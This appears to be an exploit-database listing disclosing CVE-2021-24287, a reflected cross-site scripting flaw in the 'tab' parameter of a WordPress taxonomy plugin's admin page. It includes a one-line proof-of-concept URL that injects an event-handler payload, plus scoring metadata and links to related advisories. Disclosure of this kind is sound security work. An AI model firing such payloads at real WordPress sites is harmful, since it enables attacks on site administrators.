Lucene search
0xB91337DAY-ID-36825HistorySep 29, 2021 - 12:00 a.m.
WordPress Select All Categories and Taxonomies 1.3.1 Plugin - Reflected Cross-Site Scripting
2021-09-2900:00:00
0xB9
0day.today
250
0.002 Low
EPSS
Percentile
65.1%
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
# Version: 1.3.1
# Tested on: Windows 10
# CVE: CVE-2021-24287
1. Description:
The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
Related
wpvulndb
wpvulndb
nuclei
nuclei
WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting
2023-03-05 13:42:10
nvd
nvd
CVE-2021-24287
2021-05-14 12:15:08
patchstack
patchstack
prion
prion
Cross site scripting
2021-05-14 12:15:00
packetstorm
packetstorm
WordPress Select All Categories And Taxonomies 1.3.1 Cross Site Scripting
2021-09-29 00:00:00
cve
cve
CVE-2021-24287
2021-05-14 12:15:08
cvelist
cvelist
wpexploit
wpexploit
exploitdb
exploitdb